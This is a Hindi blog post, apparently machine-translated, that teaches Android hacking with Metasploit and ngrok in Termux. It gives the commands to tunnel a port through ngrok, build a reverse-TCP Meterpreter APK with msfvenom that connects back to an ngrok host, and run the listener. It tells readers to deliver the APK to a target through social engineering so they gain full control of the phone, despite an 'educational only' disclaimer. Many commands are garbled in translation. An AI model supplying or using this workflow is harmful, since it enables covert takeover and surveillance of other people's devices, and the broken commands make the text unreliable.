Metasploit और Ngrok (टर्मक्स) का उपयोग करके Android हैकिंग #shivrajkashyap

 





Metasploit और Ngrok (टर्मक्स) का उपयोग करके Android हैकिg


#shivrajkashyap
नमस्कार दोस्तों इस लेख के माध्यम से मैं आपको बताता हूं कि आप कैसे मेटाबेसलिट का उपयोग करके आसानी से एंड्रॉइड डिवाइस पर पहुंच प्राप्त कर सकते हैं और टर्मक्स का उपयोग करके एनग्रोक कर सकते हैं।

अस्वीकरण: केवल शैक्षिक पाठ्यक्रम के लिए उपयोग किया जाना चाहिए !!

तो आइए शुरू करते हैं कि मेटस्प्लोइट क्या है, यह जानकर। Metasploit दुनिया का सबसे अधिक इस्तेमाल किया जाने वाला पैठ परीक्षण ढांचा है जो आपको कमजोरियों को खोजने, उनका शोषण करने और उन्हें सत्यापित करने में सक्षम बनाता है। यह रैपिड 7 द्वारा विकसित किया गया है और पैठ परीक्षण के लिए सबसे पसंदीदा ढांचा है।

तो चित्र में Ngrok कैसे आता है ??

उत्तर है कि मैं बाहरी (डब्लूएएन) नेटवर्क के लिए मेट टेस्स्प्लिट का उपयोग करके परीक्षण कर रहा हूं, हमें कुछ जटिल कॉन्फ़िगरेशन जैसे पोर्ट फ़ॉरवर्डिंग, एक स्थिर आईपी आदि का उपयोग करना आवश्यक है। एनग्रोक का उपयोग करके आप इन जटिलताओं को छोड़ सकते हैं।

सबसे पहले अपने एंड्रॉइड डिवाइस में प्ले स्टोर से टर्मक्स डाउनलोड करें।

फिर आपको एक खाता प्राप्त करने के लिए पहले Ngrok की वेबसाइट पर जाना होगा और फिर साइनअप करना होगा। अपने एंड्रॉइड फोन पर linux (आर्म) वर्जन डाउनलोड करें आपके पास आपके फोन में डाउनलोड की गई फाइल होगी और आपके पास बाद में इसका उपयोग करने वाली विंडो में आपके पास एक सक्रियकरण कुंजी होगी। तो टैब बंद न करें ।

अपने एंड्रॉइड फोन में टर्मक्स खोलें और कमांड ls टाइप करें

यदि आपको स्टोरेज नाम का फोल्डर दिखाई नहीं देता है तो निम्न कमांड टाइप करें।

termux सेटअप भंडारण

यदि आप फिर से ls कमांड में टाइप करते हैं, तो आपको स्टोरेज नामक एक फ़ोल्डर दिखाई देगा। उस फ़ोल्डर प्रकार को खोलें

सीडी भंडारण

फिर कमांड टाइप करके डाउनलोड फोल्डर में जाएं

सीडी डाउनलोड

अब यदि आप ls टाइप करते हैं, तो आप देखेंगे कि आपके सभी डाउनलोड ngrok ज़िप फ़ाइल के नाम की प्रतिलिपि बनाएँ और कमांड में टाइप करेंगे

अनज़िप (फ़ाइल नाम)

यह कमांड फाइल को अनज़िप कर देगी अब आप कमांड को टाइप करके फाइल को डाउनलोड से टर्मक्स में स्थानांतरित कर देंगे

एमवी एनग्रोक / $ घर

अब टाइप करें

सीडी -

अब आप टर्मक रूट में उतरेंगे, इसलिए आपको उस फ़ोल्डर की अनुमति बदलनी होगी जिसे आपने केवल कमांड टाइप करके स्थानांतरित किया था

chmod + x ngrok

अब फ़ाइल प्रकार निष्पादित करने के लिए

./ngrok

अब आपको उस पृष्ठ से दूसरी टोकन की प्रतिलिपि बनाकर अपना खाता प्रमाणित करना होगा, जहाँ आपने अपनी ngrok ज़िप फ़ाइल डाउनलोड की थी, जो कि टोकन और प्रतिलिपि को निम्न प्रकार से टाइप करें

./ngrok ऑर्ट्टोकैन (आपका ऑर्कुट टोकन)

अब आपका खाता प्रमाणित हो गया है और आपका टोकन एक कॉन्फ़िगरेशन फ़ाइल में सहेज लिया जाएगा। अब अपने Android डिवाइस के हॉटस्पॉट को खोलें और कमांड को चलाने के लिए ngrok टाइप करें

./ngrok tcp 4543

आप कोई भी पोर्ट प्रदान कर सकते हैं जो मैं 4543 दे रहा हूं। अब बाईं ओर स्वाइप करके और नए सत्र DON'T CLOSE THIS SESSION पर क्लिक करके एक नया टर्मक्स सत्र खोलें। नए सत्र में कमांड टाइप करें

pkg अस्थिर-रेपो स्थापित करता है

फिर आपको कमांड टाइप करके मेटास्प्लोइट इंस्टॉल करना होगा

pkg स्थापित मेटास्प्लोइट

पेलोड बनाने के लिए अगला CRUCIAL कदम है। एक पेलोड बनाने के लिए आपको किसी भी मेटास्प्लोइट पेलोड से जुड़े कुछ कीवर्ड्स को समझना होगा। हमारी चिंता के कीवर्ड या पैरामीटर LHOST और LPORT हैं।

पोस्ट के लिए छवि
Termux में Ngrok सत्र

यहां LHOST = 0.tcp.ngrok.io (जिसे आप एनक्रोच सत्र में आगे की पंक्ति में देख सकते हैं) और LPORT 17143 है (जो कि :) के ठीक बगल में है

अब Metasploit का उपयोग करके एक पेलोड बनाने के लिए निम्न कमांड टाइप करें

msfvenom -p android / meterpreter / Rev_tcp LHOST = 0.tcp.ngrok.io LPORT = 17143 R> sample.apk

उपर्युक्त कमांड एक पेलोड एप्लिकेशन बनाएगा जो कि टर्मक्स रूट में संग्रहीत किया जाएगा। एप्लिकेशन को अपने फ़ोन संग्रहण प्रकार पर ले जाने के लिए

एमवी नमूना.पाक / भंडारण / उत्सर्जित / 0 /

अब हम अंतिम और सबसे महत्वपूर्ण कदम पर पहुंच गए हैं, जो कि लक्ष्य डिवाइस पर पहुंच प्राप्त करने के लिए मेटस्प्लोइट फ्रेमवर्क का उपयोग करना है। मेटास्प्लोइट प्रकार चलाने के लिए

msfconsole
पोस्ट के लिए छवि
आपको इस तरह की स्क्रीन दिखाई देगी

नोट: -इस एनजीआरओ सत्र की प्रक्रिया पूरी होने के बाद भी ऑनलाइन होनी चाहिए।

आप एपीके फ़ाइल को किसी भी तरह से सोशल इंजीनियरिंग या किसी अन्य विधि से अपने लक्ष्य पर भेज सकते हैं।

अब एक-एक करके निम्नलिखित आदेशों में मेटास्प्लोइट सत्र प्रकार में

शोषण / बहु / हैंडलर का उपयोग करेंपेलोड एंड्रॉइड / मीटरपरेटर / रिवर्स_टीकैप सेट करेंLHOST लोकलहोस्ट सेट करेंसेट करें LPORT 4543

उपरोक्त आदेश सभी के लिए समान होंगे यदि आप उसी पोर्ट का उपयोग करते हैं जो मेरा है। अब अंत में टाइप करें

शोषण, अनुचित लाभ उठाना

इस समय तक आप निर्दिष्ट पोर्ट पर कनेक्शन सुन रहे होंगे। अब जब लक्ष्य डिवाइस आपके द्वारा बनाए गए एप्लिकेशन को स्थापित करता है तो आप लक्ष्य डिवाइस के साथ एक कनेक्शन स्थापित करेंगे और आप लक्ष्य फोन पर पूर्ण नियंत्रण प्राप्त करेंगे।

जब कोई कनेक्शन स्थापित होता है तो आप इस तरह से स्क्रीन को देखेंगे

पोस्ट के लिए छवि

मीटरपरेटर सत्र में आप सभी उपलब्ध विकल्पों को दिखाने के लिए कमांड की मदद टाइप कर सकते हैं और कमांड्स का पता लगा सकते हैं।

बधाई आपने सफलतापूर्वक सीखा है कि मेटासैप्लोइट और एनग्रोक का उपयोग करके वान पर एक लक्ष्य एंड्रॉइड में हैक कैसे करें।



Post a Comment

0 Comments